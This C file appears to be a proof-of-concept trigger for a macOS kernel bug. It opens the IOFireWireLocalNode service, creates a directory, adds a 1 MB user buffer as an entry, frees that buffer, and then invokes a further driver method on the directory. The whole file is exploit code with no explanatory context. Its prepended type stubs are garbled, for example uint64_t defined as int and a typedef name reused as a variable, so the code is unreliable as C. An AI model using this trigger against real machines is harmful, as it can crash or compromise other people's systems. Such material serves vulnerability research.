
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;
typedef int uint32_t ;
typedef scalar_t__ kern_return_t ;
typedef scalar_t__ io_service_t ;
typedef int io_connect_t ;
typedef int addEntry_Buffer_args ;


 scalar_t__ IOConnectCallMethod (int ,int,int*,int,int *,int ,int*,int*,int *,int *) ;
 int IOObjectRelease (scalar_t__) ;
 int IOServiceClose (int ) ;
 scalar_t__ IOServiceGetMatchingService (int ,int ) ;
 int IOServiceMatching (char*) ;
 scalar_t__ IOServiceOpen (scalar_t__,int ,int ,int *) ;
 scalar_t__ IO_OBJECT_NULL ;
 scalar_t__ KERN_SUCCESS ;
 int free (void*) ;
 int kIOMasterPortDefault ;
 int mach_task_self () ;
 void* malloc (int) ;
 int memset (void*,int,int) ;

int main() {
 int ret = 0;
 io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
   IOServiceMatching("IOFireWireLocalNode"));
 if (service == IO_OBJECT_NULL) {
  ret = 1;
  goto fail1;
 }
 io_connect_t connect;
 kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
 IOObjectRelease(service);
 if (kr != KERN_SUCCESS) {
  ret = 2;
  goto fail1;
 }

 uint64_t directory = 0;
 uint32_t output_count = 1;
 kr = IOConnectCallMethod(connect, 16,
   ((void*)0), 0, ((void*)0), 0,
   &directory, &output_count, ((void*)0), ((void*)0));
 if (kr != KERN_SUCCESS) {
  ret = 3;
  goto fail2;
 }

 uint32_t size = 0x100000;
 void *buffer = malloc(size);
 memset(buffer, 0xaa, size);
 uint64_t addEntry_Buffer_args[6] = { directory, 0, (uint64_t)buffer, size, 0, 0 };
 kr = IOConnectCallMethod(connect, 17,
   addEntry_Buffer_args,
   sizeof(addEntry_Buffer_args) / sizeof(*addEntry_Buffer_args),
   ((void*)0), 0,
   ((void*)0), ((void*)0), ((void*)0), ((void*)0));
 free(buffer);
 if (kr != KERN_SUCCESS) {
  ret = 4;
  goto fail2;
 }

 kr = IOConnectCallMethod(connect, 21,
   &directory, 1, ((void*)0), 0,
   ((void*)0), ((void*)0), ((void*)0), ((void*)0));
 if (kr != KERN_SUCCESS) {
  ret = 5;
  goto fail2;
 }
fail2:
 IOServiceClose(connect);
fail1:
 return ret;
}
